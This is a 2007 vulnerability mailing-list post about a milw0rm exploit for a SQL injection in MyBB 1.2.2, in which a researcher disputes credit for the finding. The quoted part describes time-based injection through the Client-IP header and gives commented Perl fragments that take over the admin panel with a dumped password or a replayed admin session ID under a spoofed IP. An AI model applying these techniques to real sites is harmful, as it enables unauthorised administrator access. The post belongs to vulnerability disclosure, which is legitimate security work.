[VIM] Milw0rm 3719 (Mybb <= 1.2.2)

str0ke str0ke at milw0rm.com
Thu Apr 12 17:51:58 UTC 2007


It was posted to go along with his paper that went up today.  Guessing
he just wanted to show an example of it in action.

http://www.milw0rm.com/papers/149

/str0ke

On 4/12/07, GM darkfig <gmdarkfig at gmail.com> wrote:
> The guy use the same vulnerability I found
> (http://acid-root.new.fr/poc/28070403.txt).
> He use the same method (benchmark(), Client-IP, DELETE from
> prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's
> just the perl version. He use the solution number 1 I said in my
> exploit:
>
> # SOLUTION NUMBER 1
> # mysql> select * from mybb_users\G
> # *************************** 1. row ***************************
> #              uid: 1
> #         username: root
> #         password: 39ac8681f5cf4fcd9c9c09719a618bd3
> #             salt: BFeJBOCF
> #         loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
> #
> # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
> # print $xpl->getcontent(); // ...Welcome to the MyBB Administration
> Control Panel...
> #
> # SOLUTION NUMBER 2
> # mysql> select * from mybb_adminsessions\G
> # *************************** 1. row ***************************
> #        sid: 81e267263b9254f3aaf670383bfbfec9
> #        uid: 1
> #   loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
> #         ip: 127.0.0.1
> #   dateline: 1175443967
> # lastactive: 1175444369
> #
> # $xpl->addheader('Client-IP','127.0.0.1');
> # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
> # print $xpl->getcontent(); // ...Welcome to the MyBB Administration
> Control Panel...
> #
> # I decided to use the solution number 2.
>


More information about the VIM mailing list